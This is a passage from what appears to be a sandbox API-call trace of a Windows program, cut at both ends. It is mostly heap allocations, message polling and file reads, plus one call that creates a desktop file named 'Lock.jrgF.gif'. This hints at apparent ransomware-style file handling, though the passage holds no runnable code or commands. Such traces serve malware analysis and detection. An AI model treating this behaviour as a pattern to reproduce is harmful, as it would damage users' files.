(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.jrgF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.jrgf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0166.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0166.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0166.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0166.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0166.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0166.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0166.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0166.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0166.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0166.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0166.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0166.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0166.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0166.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0166.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0166.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0166.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0166.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0166.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0166.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36a0020 [0166.056] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0166.056] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0166.058] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x30fe, lpOverlapped=0x0) returned 1 [0166.058] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0166.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0166.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x130fe) returned 0x24d7a58 [0166.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36a0020 | out: hHeap=0x25c0000) returned 1 [0166.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0166.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0166.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0166.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0166.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0166.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0166.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x130fe) returned 0x34b2250 [0166.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0166.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.063] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0166.063] TranslateMessage (lpMsg=0x8bf710) returned 0 [0166.063] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0166.063] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0166.063] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0166.063] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0166.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0166.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0166.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x130fe) returned 0x24d7a58 [0166.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0166.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0166.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0166.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0166.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.064] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0166.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0166.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0166.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0166.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0166.064] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0166.065] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0166.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0166.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x130fe) returned 0x24d7a58 [0166.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0166.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0166.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0166.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0166.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0166.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0166.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0166.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0166.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0166.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x130fe) returned 0x34c5358 [0166.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0166.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0166.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0166.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0166.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0166.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0166.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0166.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0166.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0166.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0166.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0166.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0166.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0166.068] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0166.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.068] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0166.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0166.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0166.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0166.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0166.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.070] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0166.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0166.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0166.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0166.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0166.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0166.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.070] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0166.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.071] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.071] 